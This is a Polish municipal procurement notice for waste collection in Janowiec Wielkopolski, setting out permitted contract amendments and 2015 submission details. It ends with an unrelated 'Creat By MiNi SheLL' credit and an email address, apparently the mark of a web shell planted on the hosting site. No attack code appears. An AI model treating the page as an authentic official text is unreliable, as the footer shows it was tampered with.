<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej      z okoliczności wymienionej poniżej:

1)	Zmiana wynagrodzenia  jeżeli  nastąpi znacząca zmiana kosztów zewnętrznych , będących podstawą kalkulacji ceny ofertowej, tj: 
a)	nastąpi znacząca  zmiana liczby mieszkańców względem liczby mieszkańców wykazanych                          w wykazie przez zamawiającego z tym, że zmiana powinna przekroczyć co najmniej                    (+/-)300 osób.
b)	nastąpi znacząca zmiana powyżej +/- 20 %  ilości pojemników  na odpady zmieszane odbieranych  z nieruchomości z zabudowy wielorodzinnej powyżej 7 lokali  w stosunku do ilości pojemników wykazanych w wykazie;
c)	nastąpi znacząca zmiana  powyżej +/- 30 %  ilości pojemników  na odpady zmieszane odbieranych     z nieruchomości  na której nie zamieszkują mieszkańcy  w stosunku do ilości pojemników wykazanych w wykazie;
d)	nastąpi znacząca zmiana powyżej +/- 30 %  ilości pojemników  na odpady zmieszane odbieranych   z  terenu cmentarzy w granicach administracyjnych gmin w stosunku  do ilości pojemników wykazanych w wykazie.
e)	nastąpi zmiana stawki podatku VAT. 

2)	Dopuszcza się zmianę umowy w zakresie sposobu realizacji umowy w przypadku zmiany  przepisów prawa, wpływających na sposób realizacji umowy, w tym również zmiany przepisów prawa lokalnego ( np. regulaminu utrzymania czystości i porządku w gminie).

3)	Zmiana podwykonawców jest możliwa pod warunkiem zgłoszenia takiej zmiany i uzyskania akceptacji Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.janowiec.wlkp.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Janowcu Wielkopolskim; ul. Gnieźnieńska 3; 88-430 Janowiec Wielkopolski
pokój nr 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.09.2015 godzina 10:30, miejsce: Urząd Miejski w Janowcu Wielkopolskim; ul. Gnieźnieńska 3; 88-430 Janowiec Wielkopolski
- sekretariat 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 3 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com